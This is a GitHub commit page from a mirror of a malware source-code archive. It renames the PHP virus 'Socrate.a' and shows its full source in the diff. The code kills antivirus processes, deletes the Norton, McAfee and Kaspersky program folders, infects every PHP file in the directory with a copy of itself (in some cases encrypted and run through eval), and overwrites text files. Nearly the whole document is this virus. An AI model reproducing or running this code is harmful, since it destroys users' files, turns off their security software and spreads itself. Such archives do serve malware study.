ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a

Browse Source
This commit is contained in:
vxunderground 2020-11-02 23:56:50 -06:00 committed by GitHub
parent 670d0eb11a
commit 52299c9be2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 81 additions and 81 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

162
PHP/Virus.PHP.Socrate.a → Other/Virus.PHP.Socrate.a
View File

@ -1,141 +1,141 @@
<?php
echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");
$decrypt=
"function SocratesDecrypt(\$string,\$key)\r\n"
$decrypt=
"function SocratesDecrypt(\$string,\$key)\r\n"
."{ \r\n"
." \$codez=''; \r\n"
." for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"
." { \r\n"
." \$value=ord(\$string[\$i]); \r\n"
." \$valuez=\$value+\$key; \r\n"
." \$codez.=chr(\$valuez); \r\n"
." } \r\n"
." return \$codez; \r\n"
." return \$codez; \r\n"
." } \r\n"
."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"
."\$break = Explode('/', \$filez); \r\n"
."\$pfile = \$break[count(\$break) - 1];\r\n"
."\$c = fopen(\$pfile,'rb');\r\n"
."\$c = fopen(\$pfile,'rb');\r\n"
."\$d = fread(\$c,filesize(\$pfile));\r\n"
."fclose(\$c);\r\n"
."fclose(\$c);\r\n"
."\$next=strlen(\$d)-693;\r\n"
."\$virus=substr(\$d,687,\$next);\r\n"
."\$vr=SocratesDecrypt(\$virus,'1');\r\n"
."eval(\$vr);";
function SocratesCrypt($string,$key)
{
{
$codez="";
$codez="";
for($i=0; $i<strlen($string); $i++)
for($i=0; $i<strlen($string); $i++)
{
{
$value=ord($string[$i]);
$valuez=$value-$key;
$value=ord($string[$i]);
$valuez=$value-$key;
$codez.=chr($valuez);
$codez.=chr($valuez);
}
}
return $codez;
return $codez;
}
}
if(is_dir("C:\Program Files\Norton*"))
{
exec("taskkill /f /t /im nod32.exe");
rmdir("C:\Program Files\Norton*");
rmdir("C:\Program Files\Norton*");
}
}
if(is_dir("C:\Program Files\McAfee*"))
{
{
exec("taskkill /f /t /im Mcshield.exe");
rmdir("C:\Program Files\McAfee*");
}
rmdir("C:\Program Files\McAfee*");
}
if(is_dir("C:\Program Files\Kaspersky*"))
{
exec("taskkill /f /t /im KAV.exe");
rmdir("C:\Program Files\Kaspersky*");
rmdir("C:\Program Files\Kaspersky*");
}
}
$filez = $_SERVER["SCRIPT_NAME"];
$break = Explode('/', $filez);
$pfile = $break[count($break) - 1];
$c = fopen($pfile,'rb');
$d = fread($c,filesize($pfile));
$d = fread($c,filesize($pfile));
fclose($c);
$nextsize=strlen($d)-4;
$virus=(substr($d,7,$nextsize));
$dir=opendir('*.*');
while (($file = readdir($dir)) !== false)
while (($file = readdir($dir)) !== false)
{
{
if (strstr($file,'.php'))
if (strstr($file,'.php'))
{
{
$f = fopen($file,'rb');
$f = fopen($file,'rb');
$contents = fread($f, filesize($file));
$contents = fread($f, filesize($file));
if (!strstr($contents, 'Socrates'))
if (!strstr($contents, 'Socrates'))
{
{
if(!file_exists("Socrates.php")) {
fclose($f);
$g = fopen($file,'w');
fwrite($g,$d);
fclose($f);
$g = fopen($file,'w');
fwrite($g,$d);
fclose($g);
fclose($g);
}
@ -143,11 +143,11 @@ while (($file = readdir($dir)) !== false)
if(file_exists("Socrates.php"))
{
fclose($f);
$g = fopen($file,'w');
fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>');
fclose($f);
$g = fopen($file,'w');
fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>');
fclose($g);
fclose($g);
}
@ -155,20 +155,20 @@ while (($file = readdir($dir)) !== false)
}
}
}
}
if (strstr($file,'.txt'))
if (strstr($file,'.txt'))
{
{
$f = fopen($file,'w');
$f = fopen($file,'w');
fwrite($f,"Let him that would move the world, first move himself.");
fwrite($f,"Let him that would move the world, first move himself.");
}
}
}?>
}?>